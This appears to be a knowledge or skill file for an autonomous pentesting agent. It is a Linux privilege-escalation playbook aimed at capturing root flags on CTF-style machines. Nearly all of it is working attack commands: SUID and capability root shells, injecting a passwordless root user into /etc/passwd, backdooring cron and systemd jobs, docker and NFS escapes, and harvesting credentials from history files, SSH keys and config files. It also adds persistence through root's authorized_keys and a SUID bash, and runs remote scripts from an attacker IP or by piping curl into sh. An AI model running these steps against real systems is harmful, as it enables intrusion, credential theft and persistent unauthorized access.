| name | privilege-escalation-knowledge |
| description | Comprehensive knowledge about Linux privilege escalation. Provides methodologies for enumerating and exploiting privesc vectors including SUID binaries, sudo permissions, capabilities, kernel exploits, cron jobs, and common misconfigurations. Includes systematic approach to capturing root flags. |
Privilege Escalation Knowledge Base
Purpose
This knowledge base provides comprehensive privilege escalation methodologies for Linux systems. It covers escalating from low-privilege users (www-data, user) to root, then capturing the root flag.
Layered Privilege Escalation Strategy
Core Principle: Escalate systematically through 3 layers - from quick wins to exhaustive enumeration.
Layer Framework:
Layer 1 (Quick Wins - Manual):
- Check most common vectors immediately
- Goal: Find easy privesc within 2-3 minutes
- Focus: sudo -l, SUID, obvious misconfigurations
- Time: 2-5 minutes
Layer 2 (Deep Enumeration - Automated):
- Run comprehensive enumeration tools
- Goal: Find all possible privesc vectors
- Focus: linpeas, linenum, pspy
- Time: 5-15 minutes
Layer 3 (Alternative Methods):
- Try less common vectors or kernel exploits
- Goal: Find overlooked or complex privesc paths
- Focus: Kernel exploits, container escape, NFS, etc.
- Time: Variable
Escalation Triggers:
- Layer 1 finds nothing obvious → Run Layer 2 enumeration
- Layer 2 finds vectors but exploitation fails → Try Layer 3 alternatives
- Layer 3 fails → Re-examine reconnaissance, may have missed service/config
Core Strategy
Systematic execution:
- Quick Wins (Layer 1): Check easy vectors first (sudo, SUID, capabilities)
- Deep Enumeration (Layer 2): Use automated tools to find all vectors
- Alternative Vectors (Layer 3): Kernel exploits, container escape, NFS
- Exploitation: Execute chosen privesc method
- Root Flag: Locate and read root.txt
- Verification: Confirm root access with
id, whoami
Tools Available
Enumeration Scripts
linpeas.sh - Comprehensive automated enumeration
linenum.sh - Alternative enumeration script
pspy - Monitor processes without root
Manual Commands
sudo -l - Check sudo permissions
find / -perm -4000 2>/dev/null - Find SUID binaries
getcap -r / 2>/dev/null - Find capabilities
crontab -l - Check user cron jobs
cat /etc/crontab - Check system cron jobs
References
Enumeration Workflow
Phase 1: Quick Manual Checks
Execute these immediately:
id
groups
sudo -l
find / -perm -4000 -type f 2>/dev/null
find /etc -writable -type f 2>/dev/null
ls -la /home/*/
ls -la /root/
ls -la /opt/
ls -la /var/www/html/
ps aux | grep root
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
getcap -r / 2>/dev/null
Phase 2: Automated Enumeration
Download and run linpeas:
cd /tmp
wget http://YOUR_IP:8000/linpeas.sh
curl http://YOUR_IP:8000/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh > linpeas-output.txt 2>&1
cat linpeas-output.txt | grep -i "PEASS\|password\|ssh\|priv"
If can't download, use one-liner:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Common Privilege Escalation Vectors
1. Sudo Abuse (Most Common)
sudo -l
2. SUID Binaries
find / -perm -4000 -type f 2>/dev/null
/usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")'
/usr/bin/vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
/usr/bin/find . -exec /bin/sh -p \; -quit
3. Capabilities
getcap -r / 2>/dev/null
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
4. Writable /etc/passwd
ls -la /etc/passwd
echo 'hacker:$6$salt$hashedpassword:0:0:root:/root:/bin/bash' >> /etc/passwd
echo 'hacker::0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
5. Cron Jobs
cat /etc/crontab
ls -la /etc/cron.*
echo '#!/bin/bash\nchmod +s /bin/bash' > /path/to/script.sh
/bin/bash -p
6. Writable Service Files
find /etc/systemd/system/ -writable 2>/dev/null
[Service]
ExecStart=/bin/bash -c 'chmod +s /bin/bash'
systemctl restart vulnerable.service
/bin/bash -p
7. Kernel Exploits (Last Resort)
uname -a
uname -r
searchsploit "linux kernel $(uname -r)"
searchsploit "ubuntu privilege escalation"
wget http://YOUR_IP:8000/dirtypipe.c
gcc dirtypipe.c -o dirtypipe
./dirtypipe
8. Docker/Container Escape
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker
find / -name docker.sock 2>/dev/null
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
fdisk -l
9. Credentials in Files
grep -r "password" /var/www/html/ 2>/dev/null
grep -r "pass" /etc/ 2>/dev/null
find / -name "*.config" -o -name "*.conf" 2>/dev/null | xargs grep -i "password"
cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
cat /var/www/html/config.php
cat /var/www/html/wp-config.php
10. NFS Exports
cat /etc/exports
mkdir /tmp/mount
mount -t nfs TARGET:/share /tmp/mount
cp /bin/bash /tmp/mount/bash
chmod +s /tmp/mount/bash
/share/bash -p
Exploitation Process
Step 1: Identify Vector
Based on enumeration, choose best vector:
- Sudo permissions - Highest priority, usually easiest
- SUID binaries - Check against GTFOBins
- Capabilities - Less common but powerful
- Cron jobs - May require waiting
- Kernel exploits - Last resort, can crash system
Step 2: Execute Privesc
sudo -l
sudo vim
:set shell=/bin/bash
:shell
id
Step 3: Stabilize Root Access
Once root, ensure you can maintain access:
chmod +s /bin/bash
mkdir -p /root/.ssh
echo 'YOUR_PUBLIC_KEY' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
Root Flag Capture
Locate Root Flag
cat /root/root.txt
cat /root/flag.txt
find /root -name "*.txt" 2>/dev/null
find / -name "root.txt" 2>/dev/null
Verify Flag Format
cat /root/root.txt | wc -c
cat /root/root.txt | grep -E '^[a-f0-9]{32}$'
Update State
ROOT_FLAG=$(cat /root/root.txt)
echo "Root flag: $ROOT_FLAG"
jq --arg flag "$ROOT_FLAG" '.flags.root = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json
Troubleshooting
Can't Download Tools
python3 -m http.server 8000
base64 linpeas.sh | xclip -selection clipboard
echo 'BASE64_STRING' | base64 -d > linpeas.sh
No Write Permissions
cd /tmp
cd /dev/shm
cd ~
Stuck/No Vectors Found
cat linpeas-output.txt | grep -E "PEASS|95%|99%"
env | grep -i "pass\|pwd\|key"
ps auxww | grep -i "password\|pass"
find / -perm -002 -type f 2>/dev/null
ls -la /etc/shadow /etc/passwd
find / -name "*.bak" -o -name "*.backup" 2>/dev/null
Output Format
After successful privilege escalation:
{
"status": "root_access_gained",
"method": "Sudo vim exploitation via GTFOBins",
"vector": "sudo -l showed vim with NOPASSWD",
"root_flag": "f6e5d4c3b2a1098765432109876543210",
"exploitation_time": "2 minutes",
"mission_complete": true
}
Success Criteria
Mission complete when:
- ✅ Root access obtained (uid=0)
- ✅ Root flag located and read
- ✅ Flag is 32-character hexadecimal string
- ✅ Both user and root flags captured
- ✅ State file updated with both flags
Decision Tree
Initial Access Gained
│
├─ Run: sudo -l
│ ├─ Can sudo something? → GTFOBins → Root
│ └─ No sudo → Continue
│
├─ Find SUID binaries
│ ├─ Found unusual SUID? → GTFOBins → Root
│ └─ No exploitable SUID → Continue
│
├─ Check capabilities
│ ├─ cap_setuid on python/perl? → Exploit → Root
│ └─ No caps → Continue
│
├─ Check cron jobs
│ ├─ Writable script run as root? → Backdoor → Wait → Root
│ └─ No cron → Continue
│
├─ Run linpeas
│ └─ Follow red/yellow findings
│
└─ Kernel exploit (last resort)
└─ Search and compile exploit
Key Principles
- Systematic approach - Don't skip steps, check everything
- Quick wins first - sudo before kernel exploits
- GTFOBins is your friend - Use it for SUID/sudo
- Verify before claiming - Ensure you have actual root
- Capture the flag - Read root.txt content, not just location
- Non-interactive aware - Some exploits need TTY, adapt accordingly
Remember
- Most playground machines have obvious privesc vectors
- Sudo misconfigurations are most common
- SUID binaries are second most common
- Kernel exploits are rarely needed in playgrounds
- The root flag MUST be read - don't declare success without it
- Document successful method for learning and future reference
Mission Complete
When you can execute:
root
a1b2c3d4e5f6789... (32-char hex)
Mission accomplished! Update coordinator with both flags.